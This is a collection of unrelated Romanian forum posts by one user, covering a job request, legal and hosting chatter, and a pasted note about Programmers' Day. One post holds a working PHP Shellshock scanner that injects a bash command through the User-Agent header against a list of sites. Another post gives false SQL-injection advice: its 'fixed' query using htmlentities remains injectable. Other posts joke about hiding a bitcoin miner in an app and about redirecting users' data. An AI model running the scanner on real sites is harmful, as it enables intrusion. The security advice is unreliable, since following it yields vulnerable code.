Dragos

Salutari, Caut un developer de flash pentru un amic pentru crearea unei aplicatii de videochat. Doritorii va rog lasati un raspuns daca ati mai facut asta pana acum sau alte proiecte asemanatoare in flash.

Mergi cu numaratul pixelilor din stanga sus. Facusem nebunia asta pentru un joc acum un an, doi si iti dadea si coordonatele. Ia scriptul si extrage-ti partea care te intereseaza.

S-a prajit de tot Valium. cc @aelius

Functia mysql_real_escape_string nu este suficienta pentru a bloca SQLi. Spre exemplu avem scriptul acesta $id = mysql_real_escape_string($_GET['id']); $sql = mysql_query("select * from tabel where ID=$id"); Daca introduc in GET "1 or 1=2" o sa se execute scriptul. Nu folosi nici scriptul lui @Geoutsu pentru ca se poate trece de el printr-un string codat in hexa. Cel mai usor foloseste htmlentities cu flag-ul ENT_QUOTES. $id = htmlentities($_GET['id'],ENT_QUOTES); $sql = mysql_query("select * from tabel where ID=$id");

L-am primit dupa cateva zile.

E ok ideea, dar macar daca se face, cel care doneaza sa aleaga cumva calumea cui sa-i dea in ideea in care respectivul chiar are nevoie de asta.

Ziceam si la mine pe blog, daca sunt programele de genul acum in varianta preview, ai putea sa incerci sa schimbi locul unde se trimit informatiile si ai toate datele despre om.

Sunt intentionat puse.

Asta e de script-kiddie. Eu in locul developerului as fi pus si un script de minat bitcoini in aplicatie ca daca tot descarca copiii, macar sa fac si eu un ban cinstit. Mai rapid se poate face asa din consola. <?php $situri = array("http://site.ro/","http://site2.ro"); foreach($situri as $sit) { if(scaneaza($sit)) echo $sit . "\n"; } function scaneaza($url) { $cmd = "ls"; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1; else return 0; } ?>

Din ce am inteles, oamenii de la GlobeHosting nu mai vor sa plateasca taxa de retragere a banilor din Paypal, asa ca te pun pe tine sa platesti si taxa aia. E taranism chestia asta.

In afara sa-l folosesti pe post de carpa sa mai stergi praful sau geamul de la masina, n-ai ce face cu el.

Sare pe filtrele de verificare ca nu ai content si returnezi 500 internal server error.

Pe bune? Flood? Edit: E up

Un mic tool pe care l-am scris in seara asta pentru a verifica daca un site e vulnerabil la CVE-2014-6271/CVE-2014-7169. Am I vulnerable to Shellshock / Bash bug? - Dragos Gaftoneanu

http://edition.cnn.com/2011/09/30/tech/social-media/facebook-charge-fee-ostrow/

Un 404 facut ca la carte

Creeaza fisierul 4char.txt si da-i permisiuni de citire/scriere pe el.

Astea sunt tampenii vechi de pe 4chan. De acolo a aparut si bula magica pentru apa.

Dupa ani si ani, plugin oficial de Wordpress https://wordpress.org/plugins/patch-for-revolution-slider/

Daca ai descarcat ceva de pe torrente, in ziua urmatoare vine politia la tine cu mandat.

Din cate stiu, astfel de contracte se fac cu semnatura olografa conform legii din Romania. Intreaba pe cineva care e jurist.

Ideea e buna, articolele sunt bune, dar tema pare prea incarcata.

Daca ai facut pe contract, citeste un pic clauzele contractului. Daca nu scrie vreo magarie, inseamna ca esti protejat si daca intri in instanta sau ceva, poti arata proiectul facut cap coada. Pastreaza ce ai facut in calculator pana se termina hora. Daca nu ai facut o parte din proiect, e nasol si au libertatea sa te acuze. Daca nu ai facut pe contract, n-ai treaba. Parerea mea e sa le mai trimiti o data proiectul.

La doua posturi ale tale mai ai si pretentii, mai ales ca e un subiect delicat.

International Programmers’ Day celebrates the positive changes that programmers make to improve our everyday lives. It is usually held on January 7, but is also popularly celebrated on September 13, or on September 12 in leap years. What do people do? Programmers are greeted with positive comments like “Happy Programmer’s Day” in some work environments on International Programmers' Day. The observance is also mentioned among programming communities in online forums and social media, including on facebook or Twitter. Public life International Programmers’ Day is an observance and not a public holiday. Background International Programmers’ Day was launched in 2007 to honor programmers. The day is celebrated in many countries and is officially observed in Russia. In 2009 Russian President Dmitry Medvedev signed a decree for the “Day of the Programmer” to be celebrated on the 256th day of the year, which is usually September 13, or on September 12 in leap years. Symbols Many people observe International Programmers’ Day on the 256th day of the year because “256” (28) is the number of distinct values that can be represented with an 8-bit byte, and 256 is the highest power of 2 that is less than 365, the number of days in a year. Sursa: International Programmers' Day